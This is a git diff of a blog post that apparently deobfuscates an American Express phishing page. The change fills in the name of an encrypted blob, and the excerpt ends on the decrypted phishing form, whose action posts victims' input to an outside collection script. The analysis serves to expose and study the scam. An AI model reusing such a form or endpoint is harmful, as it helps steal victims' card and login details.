jonluca/blog/_posts/2019-02-02-deobfuscating-amex-scammer.md

 ### Second blob

-There is another large, encrypted blob, stored in ``.
+There is another large, encrypted blob, stored in `OLnARWFQitgSyE`.
 Fortunately we don't have to look at the logic, as the decryption function is provided for us.
 I'm not going to go into how the decryption is done, but all the functions and variables above are used in the process.
 There were actually some syntax errors (such as not having `var`, `let`, or `const` before variable names) but once those were fixed we could get the actual contents.
 I've included the relevant part below.

 ```html
 <form name="0" id="0" action="http://souzoku-roots.com/gzipdb/data.php" autocomplete="off" method="post">